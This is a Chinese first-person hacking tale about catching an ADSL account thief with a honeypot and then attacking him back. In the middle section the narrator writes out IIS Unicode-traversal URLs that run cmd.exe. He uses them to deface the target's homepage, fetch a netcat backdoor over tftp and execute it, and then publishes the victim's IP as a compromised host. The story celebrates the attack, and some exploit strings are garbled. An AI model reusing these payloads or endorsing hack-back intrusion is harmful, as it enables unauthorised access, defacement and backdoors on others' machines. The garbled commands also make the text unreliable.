网络的高速发展带动了很多商机, 同时也造出了很多危险因素, 网络上的账号被盗事件一直是令网名十分头痛的事, 这不前几天邻居莫沙又跟我谈起她家的ADSL帐号被盗事件, 由于是看在MM象我哭诉的份上, 身为BT下载狂人的我, 暗下决定要亲自捉住此燎, 以在MM面前提高威信……
巧布疑阵
星期六通常是我的星期天, 我早早爬起床, 胡乱吃了点东西, 开始布阵, 从网络上下载了冰河陷井V1.2版来进行硬盘安装,接下来利用“冰河陷阱”的伪装功能来诱捕入侵者。 首先我运行冰河陷阱进入到主界面, 接下来在点击“设置”菜单中的“设置监听端口”, 然后输入端口号23,接下来我依次又设置了文件列表生存器,我在文件列表生存器中的“真实目录”中填入“D:\TEMP\DRIVER_C”完成后,又在“伪装成驱动器”下拉框中选择“C:”然后点击“添加”按钮将映射关系填入列表,并在“真实目录”中填入“D:\TEMP\DRIVER_D”接着在“伪装成驱动器”下拉框中选择“D:”,然后点击“添加”按钮将映射关系填入列表,好了再一次点击“生成文件”按钮重新生成DAT目录下“文件列表.txt”文件.好了一个简单的冰河陷井技术完工了,由D盘TEMP目录下的DRIVER_C目录生成虚拟的C盘文件列表, 由D盘TEMP目录下的DRIVER_D目录生成虚拟的D盘文件列表……只要有黑客进行远程访问装好的文件列表.txt 时那么当监控端点击“文件管理器”中的驱动器或目录时, “冰河陷阱”自动从该文件中检索信息, 并发送相应的目录及文件信息……这下看你如何逃出我滴手心……
网内来客
八千黑客入沙场, 兵步无车夜疯狂 …… 此时异地黑客工作室的流氓兔又在用盗来的ADSL帐号疯狂上网, 上着上着突然掉线, 正在传奇瘾上那容断线, 流氓兔用尽全身的力气火速重新连接, 天啊, 连接N次无结果, 看来是被盗的用户发觉了, 并改写了密码……郁闷……抽出一支不带过滤嘴无名香烟, 温柔地放在鼻边轻轻地嗅了嗅!流氓兔习惯性在做坏事前总是要重复这一动作……两眼在眼眶内做了一次嵌入式扫描后, 一个念头转上了眉梢, 重新寻找ADSL帐号并进行入侵, 以备传奇之需……直奔H盘hack目录下, 找出黑客工作室的通用工具SUPPERSCAN,该工具扫描速度快, 支持端口扫描与IP转换, 并可以扫描单个IP端口……流氓兔首先在软件主界面的port list setup里里选上23号端口, 然后回主界面在IP地址段中输入219.XXX.XXX.1到219.XXX.XXX.254, 点击start按纽, 不大一会功夫, 蓝色屏幕上刷刷地找到N台主机来, 一一观看事, 哈哈招思慕想的23号端口出现了, 流氓兔决定作出进一步的行动, 迅速连接, 在网页地址中输入IP地址219.XXX.XXX.XXX网络就在瞬间弹出一个登陆对话框, 要求输入用户名与密码, 头略微在流氓兔脖子上转动了一下, 用老方法ADSL的缺省adsl1234吧, 在弹出的对话框中输入用户名ADSL密码adsl1234, 哈哈, 得来全不费功夫, 进来了进来了!这次居然连弱口令都不用猜, 就看到了他的真实ADSL帐户与密码……这次点上刚刚没抽的烟, 云升一会……迅速用获得的ADSL帐号上网……
收网捕鱼
就是我漫长的等待过后, 夜深沉……系统托盘中的冰河陷阱图标不断闪烁开始报警, 同时还有声音响起, 啊哈鱼儿入网了, 赶块双击图标打开“冰河陷阱”主界面, 在列表中可以看到入侵者的IP地址、所在地以及登录密码和详细的操作过程……看完这些后我开始追捕行动!
打开工具rangescan工具, 输入入侵者的IP地址, 并在from中填入218.xxx.xxx.xxx to 中填入218.xxx.xxx.xxx在扫描内容框中写入:/scripts/..%cl%lc../winnt/system32/cmd.exe完成后, 轻轻一击扫描键, 软件自个开始工作, 而我则开始看电影屏道的大汗天子……天子结束后我回到屏上, 哎呀, 软件有结果了,赶快确定一下,打开IE在其中输入http://218.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir回车,哈哈但见页面还回如下:
Directory of c:\inetpub\scripts
2000-08-06 19 DIR>.
2000-08-06 19 DIR>..
0 File(s) 0 bytes
2 Dir(s)11,556,635,276 bytes free
果然存在此漏洞,那我就利用ECHO回显命令及管道工具来改一下他的WEB页面,格式如下:
http://218.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot
嘿嘿看到他的主页的存放目录了,那就修改吧,格式如下:
c:\inetpub\wwwroot\default.asp'>http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd".exe?/c+echo+I+love+my+homeland+>c:\inetpub\wwwroot\default.asp
哈哈,主页已修改完成,接下来我得控制他的主机,首先我从网络上下载了tftpd32.exe和ncx99.exe两个软件,并运行tftpd32.exe使本机成为FTP服务器,在IE中输入命令如下:
http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd.exe?/c+tftp -i 127.0.0.1 GET ncx99.exe c:\inetpub\scripts\\hack.exe这时我已完成上传ncx99.exe到对方主机并改名为hack.exe文件.紧接着我开始在IE中输入命令来让hack.exe执行如下:
http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\hack.exe
good命令成功完成,哈哈接下来我更省事了,可以用远程telnet来随时连接他了,小样,你想安稳地过日子只怕很难咯~于是我将他的IP地址发布在了黑客网站上,肉鸡成立……
装备ADSL
夜总是在我睡醒后退去……天明打一个电话到莫沙家让她准备我的早餐, 然后我
晃晃悠悠地起身前去……莫沙的计算机前坐定, 开始从计算机里配置ADSL内设的防火墙点击开始菜单—程序—管理工具—服务—Firewall, 这时就打开了ADSL的界面, 我们先看一下ADSL MODEM的全部功能如下:
blacklist status黑名单状态
blacklist period(min)在规定的时间内指定计算机的IP地址会处在黑名单状态下
Attack protection 选中Enable可以启用adsl内建的防火墙
Dos protection选中Enable可以启用syn Dos、icmp Dos和per-host Dos服务性保护
Max Half open Tcp conn设定不完全开放状态, 当前IP开放的百分数。
Max ICMP Com 为管理ICMP设定当前使用的连接数量的百分数。
Max Single Host Conn设定单独一台计算机能使用当前IP连接的百分数。
Log Destination记录防火墙事件。
E-mail ID of Admin 1/2/3指安管理员的电子邮箱地址。
我先在Attack protection 选中Enable可以启用adsl内建的防火墙, 并在Dos protection中选择Enable开启服务性保护, 同时选中Max Half open Tcp conn设定不完全开放状态, 与此同时启用Max ICMP Com 为管理ICMP设定当前使用的连接数量的百分数。 这样如果百分数超标, 那么这个不完全开放连接将会被关闭, 新的连接将取而代之, 并开始传输数据, 最后启用Log Destination记录防火墙事件。 这样一但发现新情况, 记录的事件将会发送给指定的管理员与有关部门!
彻底防卫ADSL
邻居莫沙看了我设置完这些后还是觉得心里没底, 硬是要我再好好想想有没有更好的办法, 并提出请我喝茶, 我眼神一亮……好吧, 难得有MM如此热情, 我就帮他提高系统安全性吧!
首先我在宽带设置中用代理猎手工具找到一个代理服务器, 隐藏了本机真实的IP地址, 接着我又从TCP/IP中进入到高级TCP/IP设置, 在其选项菜单中选择TCP/IP筛选属性,从中关闭了本机不常用的端口, 只留下80端口, 并更换了管理员的帐户与密码, 从注册表中删除了GUEST帐户, 将TCP/IP协议的NRTBIOS关闭, 并进入注册表HKEY_CURRENT_USER\SOftware\Microsoft\windows\Curr-entversion\policies\network主键下新建DWOED类型键值名为NoFileSharing-Contro1从而达到不让更改网络的文件和打印机共享功能, 以社绝黑客通过此门进入, 然后我又禁止了建立空连接, 只要将本地的安全策略设为不允许SAM账户和共享的匿名连接, 接下来我关闭了IP安全设置中的Activex控件与java禁用。 最后我给系统打上了新补丁程序, 并安装了防火墙…… 设完后, 我气定神闲地看着莫沙, 莫沙抬头望了望我又望了望天……天气不错……愣是压根闭口不提喝茶的事……
……